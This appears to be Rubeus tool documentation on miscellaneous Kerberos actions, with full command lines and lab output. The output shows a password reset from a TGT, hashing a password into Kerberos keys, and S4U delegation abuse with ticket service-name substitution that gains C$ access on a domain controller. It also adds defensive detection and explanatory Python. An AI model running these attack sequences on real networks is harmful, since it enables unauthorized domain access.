Miscellaneous

Breakdown of the miscellaneous commands:

Command         Description
-------------   ------------------------------------------------------------
createnetonly   Create a process of logon type 9
changepw        Perform the Aorato Kerberos password reset
hash            Hash a plaintext password to Kerberos encryption keys
tgssub          Substitute in alternate service names into a service ticket
currentluid     Display the current user's LUID

createnetonly

The createnetonly action uses the CreateProcessWithLogonW() API to create a new process, hidden unless /show is specified, with a SECURITY_LOGON_TYPE of 9 (NewCredentials): the equivalent of runas /netonly. The process ID and the LUID (logon session ID) of the new logon session are returned. Specific Kerberos tickets can then be applied to that session with the ptt /luid:0xA.. parameter (elevation required). Because the tickets land in the new session, the existing TGT of the current logon session is not erased.

Create a hidden upnpcont.exe process:

C:\Rubeus>Rubeus.exe createnetonly /program:"C:\Windows\System32\upnpcont.exe"

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3


[*] Action: Create Process (/netonly)

[*] Showing process : False
[+] Process         : 'C:\Windows\System32\upnpcont.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 9936
[+] LUID            : 0x4a0717f

Create a visible command prompt:

C:\Rubeus>Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3


[*] Action: Create Process (/netonly)

[*] Showing process : True
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 5352
[+] LUID            : 0x4a091c0
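From the monitoring side, a createnetonly process shows up exactly like runas /netonly: a Security-log 4624 event with Logon Type 9 and, because both go through the Secondary Logon service, Logon Process seclogo, whose TargetLogonId is the same LUID Rubeus prints. The following Python is an added example, not Rubeus code, that runs that check over a handful of constructed 4624/4634 records (flattened to key=value lines; not real logs) and reports every type-9 logon not on an allow-list of accounts expected to use /netonly. The function names and the sample values are the example's own.

```python
import re

# Constructed sample Windows Security-log records (not real logs), one key=value line each.
# For a logon-type-9 (NewCredentials) 4624 event, TargetLogonId is the LUID of the newly
# created logon session, i.e. the value Rubeus prints after createnetonly.
SAMPLE_EVENTS = """
EventID=4624 LogonType=2 SubjectUserName=- TargetUserName=harmj0y TargetLogonId=0x6de14 LogonProcessName=User32 AuthenticationPackageName=Negotiate
EventID=4624 LogonType=9 SubjectUserName=harmj0y TargetUserName=harmj0y TargetLogonId=0x4a0717f LogonProcessName=seclogo AuthenticationPackageName=Negotiate
EventID=4624 LogonType=3 SubjectUserName=- TargetUserName=PRIMARY$ TargetLogonId=0x9c3a2 LogonProcessName=Kerberos AuthenticationPackageName=Kerberos
EventID=4624 LogonType=9 SubjectUserName=svc_backup TargetUserName=svc_backup TargetLogonId=0x5b1c03 LogonProcessName=seclogo AuthenticationPackageName=Negotiate
EventID=4634 LogonType=9 TargetUserName=svc_backup TargetLogonId=0x5b1c03
"""

_FIELD = re.compile(r"(\w+)=(\S+)")


def parse_events(text: str) -> list:
    """Turn the flattened records into dicts; blank lines are skipped."""
    return [dict(_FIELD.findall(line)) for line in text.splitlines() if line.strip()]


def luid_to_int(luid: str) -> int:
    """LUIDs are printed as hex (0x121078); some tools show the decimal form instead."""
    return int(luid, 16)


def netonly_logons(events: list, expected_accounts=()) -> list:
    """Return (account, luid_hex, luid_int, logon_process) for every successful
    logon-type-9 (NewCredentials) logon whose account is not on the allow-list of
    accounts known to use runas /netonly legitimately. The LUID is the value to
    pivot on afterwards: a later ticket import aimed at that session (ptt /luid:...)
    lands there rather than in the interactive session."""
    allow = {a.lower() for a in expected_accounts}
    hits = []
    for ev in events:
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "9":
            continue
        if ev["TargetUserName"].lower() in allow:
            continue
        luid = ev["TargetLogonId"]
        hits.append((ev["TargetUserName"], luid, luid_to_int(luid), ev["LogonProcessName"]))
    return hits


if __name__ == "__main__":
    for hit in netonly_logons(parse_events(SAMPLE_EVENTS), expected_accounts=["svc_backup"]):
        print("type-9 logon: account=%s luid=%s (%d) via %s" % hit)
```

Only the harmj0y session is reported, because svc_backup is allow-listed and the 4634 logoff record is not a logon. A type-9 logon carries no proof that the supplied credentials are valid (nothing is authenticated until the session first reaches a remote resource), so the event alone says "a new credential session was created", and the LUID is what ties it to whatever that session does next.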

changepw

The changepw action will take a user's TGT .kirbi blob and execute a MS kpasswd password change with the specified /new:PASSWORD value. If /dc is not specified, the computer's current domain controller is extracted and used as the destination for the password reset traffic. This is the Aorato Kerberos password reset disclosed in 2014, and is equivalent to Kekeo's misc::changepw function.

You can retrieve a TGT blob using the asktgt command.

C:\Rubeus>Rubeus.exe changepw /ticket:doIFFjCCBRKgA...(snip)...== /new:Password123!

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.3.3

[*] Action: Reset User Password (AoratoPw)

[*] Changing password for user: harmj0y@TESTLAB.LOCAL
[*] New password value: Password123!
[*] Building AP-REQ for the MS Kpassword request
[*] Building Authenticator with encryption key type: rc4_hmac
[*] base64(session subkey): nX2FOQ3RsGxoI8uqIg1zlg==
[*] Building the KRV-PRIV structure
[*] Connecting to 192.168.52.100:464
[*] Sent 1347 bytes
[*] Received 167 bytes
[+] Password change success!

hash

The hash action takes a /password:X and optionally a /user:USER and/or /domain:DOMAIN. It generates the rc4_hmac (NTLM) representation of the password using @gentilkiwi's kerberos::hash (KERB_ECRYPT HashPassword) approach. If both user and domain names are specified, the aes128_cts_hmac_sha1, aes256_cts_hmac_sha1, and des_cbc_md5 forms are generated as well; the user and domain names form the salt for the AES and DES derivations.

Calculating the rc4_hmac of a password:

C:\Rubeus>Rubeus.exe hash /password:Password123!

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.0


[*] Action: Calculate Password Hashes

[*] Input password             : Password123!
[*]       rc4_hmac             : 2B576ACBE6BCFDA7294D6BD18041B8FE

[!] /user:X and /domain:Y need to be supplied to calculate AES and DES hash types!

Calculating all hash formats:

C:\Rubeus>Rubeus.exe hash /password:Password123! /user:harmj0y /domain:testlab.local

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.0


[*] Action: Calculate Password Hashes

[*] Input password             : Password123!
[*] Input username             : harmj0y
[*] Input domain               : testlab.local
[*] Salt                       : TESTLAB.LOCALharmj0y
[*]       rc4_hmac             : 2B576ACBE6BCFDA7294D6BD18041B8FE
[*]       aes128_cts_hmac_sha1 : B0A79AB550536860123B427C14F2A531
[*]       aes256_cts_hmac_sha1 : F7FEBF9779401B653911A56A79FF9E3A58F7F8990FDB3D9CA0E89227ABF13287
[*]       des_cbc_md5          : 614589E66D6B3792

tgssub

The tgssub action will take a service ticket base64 blob/file specification and substitute an alternate service name into the ticket. This is useful for S4U abuse and other scenarios.

The /altservice:X flag is required and can either be a standalone sname (ldap, cifs, etc.) or a full service principal name (cifs/computer.domain.com). The latter is useful in some S4U2self abuse scenarios with resource-based constrained delegation. See Elad Shamir's post on the topic for more information.

The /ptt flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session. The /luid:0xA.. flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current logon session.

Executing the S4U2self/S4U2proxy process to abuse traditional constrained delegation and replacing the sname in the final ticket, so that the S4U process does not have to be run a second time:

C:\Rubeus>Rubeus.exe s4u /user:patsy /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /msdsspn:ldap/PRIMARY.testlab.local /impersonateuser:harmj0y /ptt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 2B576ACBE6BCFDA7294D6BD18041B8FE
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building AS-REQ (w/ preauth) for: 'testlab.local\patsy'
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIE+jCCBPagAwIBBaEDAgEWoo...(snip)...


[*] Action: S4U

[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building S4U2self request for: 'patsy@TESTLAB.LOCAL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'harmj0y@TESTLAB.LOCAL' to 'patsy@TESTLAB.LOCAL'
[*] base64(ticket.kirbi):

    doIFXjCCBVqgAwIBBaEDAgEWoo...(snip)...

[*] Impersonating user 'harmj0y' to target SPN 'ldap/PRIMARY.testlab.local'
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building S4U2proxy request for service: 'ldap/PRIMARY.testlab.local'
[*] Sending S4U2proxy request
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'ldap/PRIMARY.testlab.local':

    doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)...

[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Rubeus>dir \\primary.testlab.local\C$
Access is denied.

C:\Rubeus>Rubeus.exe tgssub /ticket:doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)... /altservice:cifs /ptt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Service Ticket sname Substitution

[*] Substituting in alternate service name: cifs
[*] base64(ticket.kirbi):

    doIGPjCCBjqgAwIBBaEDAgEWoo...(snip)...

[*] Action: Describe Ticket

UserName              :  harmj0y@TESTLAB.LOCAL
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  cifs/PRIMARY.testlab.local
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  3/1/2019 12:51:06 PM
EndTime               :  3/1/2019 5:51:06 PM
RenewTill             :  3/8/2019 12:51:06 PM
Flags                 :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType               :  aes128_cts_hmac_sha1
Base64(key)           :  yxQVMhl0qn3P0wUUC4KnGQ==


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Rubeus>dir \\primary.testlab.local\C$
Volume in drive \\primary.testlab.local\C$ has no label.
Volume Serial Number is A48B-4D68

Directory of \\primary.testlab.local\C$

07/05/2018  12:57 PM    <DIR>          dumps
03/05/2017  04:36 PM    <DIR>          inetpub
07/21/2018  07:41 PM                 9 out.txt
08/22/2013  07:52 AM    <DIR>          PerfLogs
04/15/2017  05:25 PM    <DIR>          profiles
08/28/2018  11:51 AM    <DIR>          Program Files
08/28/2018  11:51 AM    <DIR>          Program Files (x86)
10/09/2018  12:04 PM    <DIR>          Temp
08/23/2018  03:52 PM    <DIR>          Users
10/25/2018  01:15 PM    <DIR>          Windows
            1 File(s)              9 bytes
            9 Dir(s)  40,463,851,520 bytes free

C:\Rubeus>Rubeus.exe klist

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2



[*] Action: List Kerberos Tickets (Current User)

[*] Current LUID    : 0x6de14

    [0] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 3/1/2019 12:51:06 PM ; 3/1/2019 5:51:06 PM ; 3/8/2019 12:51:06 PM
    Server Name       : cifs/PRIMARY.testlab.local @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)

    [1] - 0x12 - aes256_cts_hmac_sha1
    Start/End/MaxRenew: 3/1/2019 12:51:06 PM ; 3/1/2019 5:51:06 PM ; 3/8/2019 12:51:06 PM
    Server Name       : ldap/PRIMARY.testlab.local @ TESTLAB.LOCAL
    Client Name       : harmj0y @ TESTLAB.LOCAL
    Flags             : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)

Executing S4U2self against a machine using its machine account hash, then substituting in the service names to abuse afterwards:

C:\Rubeus>Rubeus.exe s4u /user:primary$ /rc4:46b910dbe4514bd144b44cb554c256db /impersonateuser:harmj0y

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2

[*] Action: Ask TGT

[*] Using rc4_hmac hash: 46b910dbe4514bd144b44cb554c256db
[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building AS-REQ (w/ preauth) for: 'testlab.local\primary$'
[+] TGT request successful!
[*] base64(ticket.kirbi):

    doIFIDCCBRygAwIBBaEDAgEWoo...(snip)...


[*] Action: S4U

[*] Using domain controller: PRIMARY.testlab.local (192.168.52.100)
[*] Building S4U2self request for: 'primary$@TESTLAB.LOCAL'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Got a TGS for 'harmj0y@TESTLAB.LOCAL' to 'primary$@TESTLAB.LOCAL'
[*] base64(ticket.kirbi):

    doIFgDCCBXygAwIBBaEDAgEWoo...(snip)...


C:\Rubeus>Rubeus.exe describe /ticket:doIFgDCCBXygAwIBBaEDAgEWoo...(snip)...

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Describe Ticket

UserName              :  harmj0y@TESTLAB.LOCAL
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  primary$
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  3/1/2019 12:43:56 PM
EndTime               :  3/1/2019 5:43:56 PM
RenewTill             :  3/8/2019 12:43:56 PM
Flags                 :  name_canonicalize, ok_as_delegate, pre_authent, renewable
KeyType               :  aes256_cts_hmac_sha1
Base64(key)           :  X6LnSCb4FUGo4Wec2FnfgQRz0h8zfgIRZxENxcIoIpU=

[!] Service ticket uses encryption key type 'aes256_cts_hmac_sha1', unable to extract hash and salt.


C:\Rubeus>dir \\primary.testlab.local\C$
Access is denied.

C:\Rubeus>Rubeus.exe purge

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2

Luid: 0x0

[*] Action: Purge Tickets
[+] Tickets successfully purged!

C:\Rubeus>Rubeus.exe tgssub /ticket:doIFgDCCBXygAwIBBaEDAgEWoo...(snip)... /altservice:cifs/primary.testlab.local /ptt

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Service Ticket sname Substitution

[*] Substituting in alternate service name: cifs/primary.testlab.local
[*] base64(ticket.kirbi):

    doIFpjCCBaKgAwIBBaEDAgEWoo...(snip)...

[*] Action: Describe Ticket

UserName              :  harmj0y@TESTLAB.LOCAL
UserRealm             :  TESTLAB.LOCAL
ServiceName           :  cifs/primary.testlab.local
ServiceRealm          :  TESTLAB.LOCAL
StartTime             :  3/1/2019 12:43:56 PM
EndTime               :  3/1/2019 5:43:56 PM
RenewTill             :  3/8/2019 12:43:56 PM
Flags                 :  name_canonicalize, ok_as_delegate, pre_authent, renewable
KeyType               :  aes256_cts_hmac_sha1
Base64(key)           :  X6LnSCb4FUGo4Wec2FnfgQRz0h8zfgIRZxENxcIoIpU=


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Rubeus>dir \\primary.testlab.local\C$
Volume in drive \\primary.testlab.local\C$ has no label.
Volume Serial Number is A48B-4D68

Directory of \\primary.testlab.local\C$

07/05/2018  12:57 PM    <DIR>          dumps
03/05/2017  04:36 PM    <DIR>          inetpub
08/22/2013  07:52 AM    <DIR>          PerfLogs
04/15/2017  05:25 PM    <DIR>          profiles
08/28/2018  11:51 AM    <DIR>          Program Files
08/28/2018  11:51 AM    <DIR>          Program Files (x86)
10/09/2018  12:04 PM    <DIR>          Temp
08/23/2018  03:52 PM    <DIR>          Users
10/25/2018  01:15 PM    <DIR>          Windows
            1 File(s)              9 bytes
            9 Dir(s)  40,462,831,616 bytes free
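Why the substituted ticket is accepted, as an added toy model that is not Rubeus code: in an RFC 4120 Ticket the sname and realm sit in the cleartext outer structure, while the enc-part (cname, session key, flags, times, authorization data) is encrypted under the long-term key of the account that owns the SPN and does not repeat the sname. A service can therefore only check that the enc-part opens with its own key. Below, an HMAC-SHA256 tag under the account key stands in for that encryption (real tickets are ASN.1/DER with Kerberos encryption types), the account and SPN names follow the page's scenario, and the MSSQLSvc SPN on a separate svc_sql account is a hypothetical addition to show the case where substitution fails.

```python
import hashlib
import hmac
import json
import secrets

# Toy model of the RFC 4120 Ticket layout that tgssub relies on. The "seal" is an HMAC under
# the owning account's key and stands in for encryption of enc-part; the sname is deliberately
# NOT covered by it, exactly as in the real structure.


def _seal(key: bytes, enc_part: dict) -> str:
    return hmac.new(key, json.dumps(enc_part, sort_keys=True).encode(), hashlib.sha256).hexdigest()


def kdc_issue(spn_owner: dict, account_keys: dict, sname: str, cname: str) -> dict:
    """KDC: resolve the SPN to its owning account and seal enc-part with that account's key."""
    key = account_keys[spn_owner[sname]]
    enc_part = {"cname": cname, "session_key": secrets.token_hex(16),
                "flags": ["forwardable", "renewable", "pre_authent"]}
    return {"realm": "TESTLAB.LOCAL", "sname": sname, "enc_part": enc_part,
            "tag": _seal(key, enc_part)}


def service_accepts(ticket: dict, served_spns: set, my_key: bytes) -> bool:
    """Service: the ticket must name an SPN I serve and its enc-part must open with my own key.
    Nothing inside enc-part repeats the sname, so this is the whole check."""
    if ticket["sname"] not in served_spns:
        return False
    return hmac.compare_digest(_seal(my_key, ticket["enc_part"]), ticket["tag"])


def substitute_sname(ticket: dict, alt_sname: str) -> dict:
    """What tgssub does: rewrite the cleartext sname and leave enc-part and its seal untouched."""
    return {**ticket, "sname": alt_sname}


def demo() -> dict:
    """Page scenario (ldap/ and cifs/ on PRIMARY both owned by PRIMARY$) plus one hypothetical
    SPN owned by a dedicated service account with its own key."""
    keys = {"PRIMARY$": secrets.token_bytes(32), "svc_sql": secrets.token_bytes(32)}
    spn_owner = {"ldap/PRIMARY.testlab.local": "PRIMARY$",
                 "cifs/PRIMARY.testlab.local": "PRIMARY$",
                 "MSSQLSvc/PRIMARY.testlab.local:1433": "svc_sql"}  # hypothetical
    ldap_ticket = kdc_issue(spn_owner, keys, "ldap/PRIMARY.testlab.local", "harmj0y")
    cifs_forged = substitute_sname(ldap_ticket, "cifs/PRIMARY.testlab.local")
    sql_forged = substitute_sname(ldap_ticket, "MSSQLSvc/PRIMARY.testlab.local:1433")
    return {
        "ldap_as_issued": service_accepts(ldap_ticket, {"ldap/PRIMARY.testlab.local"}, keys["PRIMARY$"]),
        "cifs_same_account": service_accepts(cifs_forged, {"cifs/PRIMARY.testlab.local"}, keys["PRIMARY$"]),
        "sql_separate_account": service_accepts(sql_forged, {"MSSQLSvc/PRIMARY.testlab.local:1433"}, keys["svc_sql"]),
    }


if __name__ == "__main__":
    for name, accepted in demo().items():
        print(f"{name:22s}: {'accepted' if accepted else 'rejected'}")
```

The demo() result spells out the defensive point: substitution only crosses SPNs that resolve to the same account key. ldap/ and cifs/ on a domain controller always share the machine account, but a service running under its own service account (or gMSA) rejects a ticket minted for another account's SPN, and the enc-part cannot be re-sealed without that account's key. On the KDC side, a 4769 event records the service account (PRIMARY$) rather than the individual SPN, so the substitution leaves no KDC-side trace that distinguishes cifs/ from ldap/.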

currentluid

The currentluid action will display the current user's logon ID (LUID).

C:\Rubeus>Rubeus.exe currentluid

 ______        _
(_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
|  __  /| | | |  _ \| ___ | | | |/___)
| |  \ \| |_| | |_) ) ____| |_| |___ |
|_|   |_|____/|____/|_____)____/(___/

v1.5.0


[*] Action: Display current LUID

[*] Current LogonID (LUID) : 0x121078 (1183864)
